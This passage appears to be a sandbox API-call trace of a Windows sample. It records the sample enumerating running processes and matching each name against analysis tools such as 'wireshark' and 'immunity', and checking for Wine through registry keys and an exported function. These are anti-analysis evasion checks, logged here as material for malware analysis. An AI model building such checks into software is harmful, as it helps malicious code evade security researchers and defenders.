(lpFirst="WmiPrvSE.exe", lpSrch="wireshark") returned 0x0 [0082.978] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0082.979] StrStrIW (lpFirst="taskhost.exe", lpSrch="wireshark") returned 0x0 [0082.979] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="undertake.exe")) returned 1 [0082.979] StrStrIW (lpFirst="undertake.exe", lpSrch="wireshark") returned 0x0 [0082.979] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="luxury-westminster-editing-cube.exe")) returned 1 [0082.979] StrStrIW (lpFirst="luxury-westminster-editing-cube.exe", lpSrch="wireshark") returned 0x0 [0082.979] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="devon stickers.exe")) returned 1 [0082.980] StrStrIW (lpFirst="devon stickers.exe", lpSrch="wireshark") returned 0x0 [0082.980] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="eagles_podcast_type_marker.exe")) returned 1 [0082.980] StrStrIW (lpFirst="eagles_podcast_type_marker.exe", lpSrch="wireshark") returned 0x0 [0082.980] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="groups.exe")) returned 1 [0082.981] StrStrIW (lpFirst="groups.exe", lpSrch="wireshark") returned 0x0 [0082.981] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="filesdetectedlosebenjamin.exe")) returned 1 [0082.981] StrStrIW (lpFirst="filesdetectedlosebenjamin.exe", lpSrch="wireshark") returned 0x0 [0082.981] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cincinnati consumers se.exe")) returned 1 [0082.981] StrStrIW (lpFirst="cincinnati consumers se.exe", lpSrch="wireshark") returned 0x0 [0082.981] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="simply_wa_thumbnail_programmers.exe")) returned 1 [0082.982] StrStrIW (lpFirst="simply_wa_thumbnail_programmers.exe", lpSrch="wireshark") returned 0x0 [0082.982] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x848, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="medicaid.exe")) returned 1 [0082.982] StrStrIW (lpFirst="medicaid.exe", lpSrch="wireshark") returned 0x0 [0082.982] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="gateway.exe")) returned 1 [0082.982] StrStrIW (lpFirst="gateway.exe", lpSrch="wireshark") returned 0x0 [0082.982] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="laden.exe")) returned 1 [0082.983] StrStrIW (lpFirst="laden.exe", lpSrch="wireshark") returned 0x0 [0082.983] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="lying-yourself.exe")) returned 1 [0082.983] StrStrIW (lpFirst="lying-yourself.exe", lpSrch="wireshark") returned 0x0 [0082.983] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="disclaimer_saudi_agreed_oem.exe")) returned 1 [0082.984] StrStrIW (lpFirst="disclaimer_saudi_agreed_oem.exe", lpSrch="wireshark") returned 0x0 [0082.984] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleague wrap.exe")) returned 1 [0082.984] StrStrIW (lpFirst="colleague wrap.exe", lpSrch="wireshark") returned 0x0 [0082.984] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hottest-jm-depression-fought.exe")) returned 1 [0082.985] StrStrIW (lpFirst="hottest-jm-depression-fought.exe", lpSrch="wireshark") returned 0x0 [0082.985] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="saturday.exe")) returned 1 [0082.985] StrStrIW (lpFirst="saturday.exe", lpSrch="wireshark") returned 0x0 [0082.985] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0082.985] StrStrIW (lpFirst="WINWORD.EXE", lpSrch="wireshark") returned 0x0 [0082.985] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.986] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.986] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0082.986] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch="wireshark") returned 0x0 [0082.986] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0082.987] StrStrIW (lpFirst="sppsvc.exe", lpSrch="wireshark") returned 0x0 [0082.987] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.987] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.987] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 1 [0082.987] StrStrIW (lpFirst="iuoldw.exe", lpSrch="wireshark") returned 0x0 [0082.987] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 0 [0082.988] CloseHandle (hObject=0x148) returned 1 [0082.988] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x759f0000 [0082.988] GetProcAddress (hModule=0x759f0000, lpProcName="wine_get_unix_file_name") returned 0x0 [0082.988] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\WINE", ulOptions=0x0, samDesired=0x1, phkResult=0x18f838 | out: phkResult=0x18f838*=0x0) returned 0x2 [0082.988] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\WINE", ulOptions=0x0, samDesired=0x1, phkResult=0x18f838 | out: phkResult=0x18f838*=0x0) returned 0x2 [0082.988] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0082.990] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.990] StrStrIW (lpFirst="[System Process]", lpSrch="immunity") returned 0x0 [0082.990] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0082.990] StrStrIW (lpFirst="System", lpSrch="immunity") returned 0x0 [0082.990] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0082.991] StrStrIW (lpFirst="smss.exe", lpSrch="immunity") returned 0x0 [0082.991] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0082.991] StrStrIW (lpFirst="csrss.exe", lpSrch="immunity") returned 0x0 [0082.991] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0082.992] StrStrIW (lpFirst="wininit.exe", lpSrch="immunity") returned 0x0 [0082.992] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0082.992] StrStrIW (lpFirst="csrss.exe", lpSrch="immunity") returned 0x0 [0082.992] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0082.992] StrStrIW (lpFirst="winlogon.exe", lpSrch="immunity") returned 0x0 [0082.992] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0082.993] StrStrIW (lpFirst="services.exe", lpSrch="immunity") returned 0x0 [0082.993] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0082.993] StrStrIW (lpFirst="lsass.exe", lpSrch="immunity") returned 0x0 [0082.993] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0082.994] StrStrIW (lpFirst="lsm.exe", lpSrch="immunity") returned 0x0 [0082.994] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.994] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.994] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.994] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.994] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.995] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.995] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.995] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.995] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.996] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.996] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0082.996] StrStrIW (lpFirst="audiodg.exe", lpSrch="immunity") returned 0x0 [0082.996] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.996] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.996] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.997] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.997] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0082.997] StrStrIW (lpFirst="spoolsv.exe", lpSrch="immunity") returned 0x0 [0082.997] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.998] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0082.998] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0082.998] StrStrIW (lpFirst="OfficeClickToRun.exe", lpSrch="immunity") returned 0x0 [0082.998] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0082.998] StrStrIW (lpFirst="taskhost.exe", lpSrch="immunity") returned 0x0 [0082.998] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0082.999] StrStrIW (lpFirst="dwm.exe", lpSrch="immunity") returned 0x0 [0082.999] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0083.000] StrStrIW (lpFirst="explorer.exe", lpSrch="immunity") returned 0x0 [0083.000] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.000] StrStrIW (lpFirst="taskeng.exe", lpSrch="immunity") returned 0x0 [0083.000] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.001] StrStrIW (lpFirst="taskeng.exe", lpSrch="immunity") returned 0x0 [0083.001] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0083.001] StrStrIW (lpFirst="ONENOTEM.EXE", lpSrch="immunity") returned 0x0 [0083.001] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0083.001] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="immunity") returned 0x0 [0083.001] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.002] StrStrIW (lpFirst="taskhost.exe", lpSrch="immunity") returned 0x0 [0083.002] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="undertake.exe")) returned 1 [0083.002] StrStrIW (lpFirst="undertake.exe", lpSrch="immunity") returned 0x0 [0083.002] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="luxury-westminster-editing-cube.exe")) returned 1 [0083.003] StrStrIW (lpFirst="luxury-westminster-editing-cube.exe", lpSrch="immunity") returned 0x0 [0083.003] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="devon stickers.exe")) returned 1 [0083.003] StrStrIW (lpFirst="devon stickers.exe", lpSrch="immunity") returned 0x0 [0083.003] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="eagles_podcast_type_marker.exe")) returned 1 [0083.004] StrStrIW (lpFirst="eagles_podcast_type_marker.exe", lpSrch="immunity") returned 0x0 [0083.004] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="groups.exe")) returned 1 [0083.004] StrStrIW (lpFirst="groups.exe", lpSrch="immunity") returned 0x0 [0083.004] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="filesdetectedlosebenjamin.exe")) returned 1 [0083.004] StrStrIW (lpFirst="filesdetectedlosebenjamin.exe", lpSrch="immunity") returned 0x0 [0083.004] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cincinnati consumers se.exe")) returned 1 [0083.005] StrStrIW (lpFirst="cincinnati consumers se.exe", lpSrch="immunity") returned 0x0 [0083.005] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="simply_wa_thumbnail_programmers.exe")) returned 1 [0083.005] StrStrIW (lpFirst="simply_wa_thumbnail_programmers.exe", lpSrch="immunity") returned 0x0 [0083.005] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x848, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="medicaid.exe")) returned 1 [0083.006] StrStrIW (lpFirst="medicaid.exe", lpSrch="immunity") returned 0x0 [0083.006] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="gateway.exe")) returned 1 [0083.006] StrStrIW (lpFirst="gateway.exe", lpSrch="immunity") returned 0x0 [0083.006] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="laden.exe")) returned 1 [0083.007] StrStrIW (lpFirst="laden.exe", lpSrch="immunity") returned 0x0 [0083.007] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="lying-yourself.exe")) returned 1 [0083.007] StrStrIW (lpFirst="lying-yourself.exe", lpSrch="immunity") returned 0x0 [0083.007] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, 